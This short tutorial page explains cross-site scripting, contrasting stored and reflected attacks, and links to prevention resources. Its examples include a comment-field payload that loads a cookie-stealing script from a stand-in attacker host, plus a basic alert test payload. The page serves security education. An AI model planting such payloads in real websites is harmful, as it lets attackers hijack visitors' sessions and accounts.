---
date: 2018-08-10
title: XSS
categories:
  - security
description:
type: Document
set: security
set_order: 2
---

## General information

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign
and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the
form of a browser side script, to a different end user. A successful cross site scripting attack can have devastating consequences for an online business’s reputation and its relationship with its clients.

Depending on the severity of the attack, user accounts may be compromised, Trojan horse programs activated and page content modified, misleading users into willingly surrendering their private data. Finally, session cookies could be revealed, enabling a perpetrator to impersonate valid users and abuse their private accounts.

## XSS types

There are 2 types of XSS vulnerabilities:

* Stored
* Reflected

Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.

Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user’s browser. The script is embedded into a link, and is only activated once that link is clicked on.

## Basic examples

While browsing an e-commerce website, a perpetrator discovers a vulnerability that allows HTML tags to be embedded in the site’s comments section. The embedded tags become a permanent feature of the page, causing the browser to parse them with the rest of the source code every time the page is opened.

The attacker adds the following comment: Great price for a great item! Read my review here <script src=”http://hackersite.com/authstealer.js”> </script>.

From this point on, every time the page is accessed, the HTML tag in the comment will activate a JavaScript file, which is hosted on another site, and has the ability to steal visitors’ session cookies.

Using the session cookie, the attacker can compromise the visitor’s account, granting him easy access to his personal information and credit card data. Meanwhile, the visitor, who may never have even scrolled down to the comments section, is not aware that the attack took place.

Now let's consider reflected XSS attack example. Imagine that you have input field which allows you to perform search on the site. You input something like <script>alert(1)</script>foo into it and hit enter. On a vulnerable site, that entire parameter will get injected into the error page that pops up, the javascript will execute, and you'll get a popup in addition to the "Resource foo is not found" message. If you can induce somebody else navigate to the same link that you crafted, you can execute arbitrary javascript in their session.

## What's next?

Here are some useful links to expand your knowledge:
* Extended info about how to prevent XSS is listed on [OWASP article](https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet);
* General [article](https://www.incapsula.com/web-application-security/cross-site-scripting-xss-attacks.html) about XSS attacks with explanation of some mitigation techniques for this vulnerability;
* More practical example listed [here](https://www.thegeekstuff.com/2012/02/xss-attack-examples/?utm_source=tuicool);
* [Free online source](https://alf.nu/alert1) to practise your skills. 
